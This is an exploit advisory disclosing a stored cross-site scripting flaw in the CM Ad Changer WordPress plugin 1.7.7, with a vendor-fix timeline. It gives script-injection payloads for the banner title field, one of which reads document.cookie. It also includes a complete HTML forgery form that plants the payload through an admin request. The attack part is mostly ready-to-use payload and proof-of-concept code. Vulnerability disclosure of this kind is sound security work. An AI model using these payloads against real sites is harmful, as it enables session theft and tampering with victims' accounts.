#Exploit Title: CM Ad Changer Plugin XSS
#Date: 9/6/2016
#Exploit Author: Aaditya Purani
#Author Homepage: https://aadityapurani.com
#Vendor Homepage: https://ad-changer.cminds.com
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip (Updated)
#Version: 1.7.7
#Tested on: Wordpress 4.5.2
#Category: Web applications
Description:
An Stored Cross Site Scripting was reported by me to CM Ad Plugins under which an Unprivileged user can Trigger a Stored XSS to perform malicious action or any attacker could send a Crafted link which can trigger Stored XSS
Steps to Produce:
1) Go to CM Ad changers -> Campaigns
2) Create a Campaign. Enter whatever you want in Campaign settings, in the next tab "Campaign Banners", select an Image in Campaign images and in Banner Title enter this payload
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>
3) Enter Save & Payload triggers everytime you Return.
Attacker Can Make a Payload File containing the following:
<html>
<body>
<h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>
<form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}" method="POST">
<input type="hidden" name="campaign_id" value="1" />
<input type="hidden" name="title" value="Hacked by Aaditya" />
<input type="hidden" name="comment" value="" />
<input type="hidden" name="link" value="" />
<input type="hidden" name="status" value="on" />
<input type="hidden" name="banner_display_method" value="selected" />
<input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
<input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
<input type="hidden" name="banner_title_tag[]" value="" />
<input type="hidden" name="banner_tag[]" value="" />
<input type="hidden" name="banner_link[]" value="" />
<input type="hidden" name="banner_weight[]" value="0" />
<input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This will Trigger Stored XSS at banner_title Parameter.
It has been fixed and Version 1.7.8 Released on 9th June
Visit Here: https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes
---------Timeline----------
1st June : Reported to Vendor Creative Minds
3rd June: Additional Information provided
6th June: Team will able to reproduce
7th June: Fix and confirmed by me
9th June: Publically Fix released & Changelog updated 1.7.8
Regards,
Aaditya Purani